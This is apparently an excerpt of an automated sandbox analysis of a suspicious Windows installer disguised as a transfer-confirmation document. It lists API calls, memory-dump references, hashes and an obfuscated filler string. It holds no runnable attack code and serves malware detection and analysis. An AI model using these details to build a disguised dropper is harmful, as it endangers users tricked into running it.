                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                  • CloseHandle.KERNEL32(?), ref: 00405695
                  Strings
                  • Error launching installer, xrefs: 00405676
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: Error launching installer
                  • API String ID: 3712363035-66219284
                  • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                  • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                  • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                  • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                  APIs
                    • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061DF
                    • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                    • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061F3
                    • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00406206
                  • CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00403345
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Char$Next$CreateDirectoryPrev
                  • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                  • API String ID: 4115351271-3049706366
                  • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                  • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                  • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                  • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                  • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                  • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                  • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                  • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                  • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                  • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                  • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                  • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                  • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                  • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                  • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                  • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                  • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                  • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                  • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                  • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                  • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                  • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                  APIs
                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB
                  Strings
                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                  • API String ID: 2738559852-2559241417
                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                  • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                  • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                  APIs
                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                  • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                  • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                  • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                  APIs
                    • Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: CloseDeleteOpenValue
                  • String ID:
                  • API String ID: 849931509-0
                  • Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                  • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
                  • Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                  • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
                  APIs
                  • OleInitialize.OLE32(00000000), ref: 00405275
                    • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                  • OleUninitialize.OLE32(00000404,00000000), ref: 004052C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: InitializeMessageSendUninitialize
                  • String ID:
                  • API String ID: 2896919175-0
                  • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                  • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
                  • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                  • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
                  APIs
                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                  • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd
                  Similarity
                  • API ID: Window$EnableShow
                  • String ID:
                  • API String ID: 1136574915-0
                  • Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
                  • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                  • Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
                  • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                  APIs
                  • GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405B58
                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
